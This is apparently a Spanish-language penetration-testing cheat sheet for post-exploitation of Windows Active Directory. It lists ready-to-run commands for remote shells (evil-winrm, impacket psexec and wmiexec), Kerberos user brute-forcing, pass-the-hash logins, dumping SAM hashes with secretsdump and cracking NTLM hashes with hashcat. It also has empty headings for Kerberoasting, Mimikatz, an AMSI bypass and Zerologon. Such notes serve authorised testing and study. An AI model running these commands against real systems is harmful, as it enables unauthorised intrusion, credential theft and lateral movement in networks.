Ataques Post-Explotación
Acceso con Shell
evil-winrm -i <target> -u <username> -p <password>
impacket-psexec dominio.local/<USER>@<IP>
impacket-wmiexec dominio.local/<USER>@<IP>Enumeración de usuarios mediante fuerza bruta a Kerberos
kerbrute -domain <DOMAIN>.LOCAL -users <USER_LIST> -dc-ip <IP>Pass the Hash
#Comprobar credenciales válidas
crackmapexec smb <IP/CIDR> -u <USER> -H <HASH> --local-auth
#Inicio de sesión PTH
evil-winrm -i <DOMAIN>.local -u <USER> -H "<HASH>"
impacket-psexec <USER>:@<IP> -hashes <LMHASH>:<NTHASH>Extracción de hashes de la SAM
impacket-secretsdump <DOMINIO>.LOCAL/<USER>@<IP>Cracking de hashes NTLM
hashcat -m 1000 hashes.txt rockyou.txtExtracción de datos del dominio
Kerberoasting
Mimikatz
Evasión de antivirus
AMSI Bypass (Funcionando 12/2022)
Otros ataques
Group Policy Preferences (GPP Attack)
Zerologon
PrintNightmare
Última actualización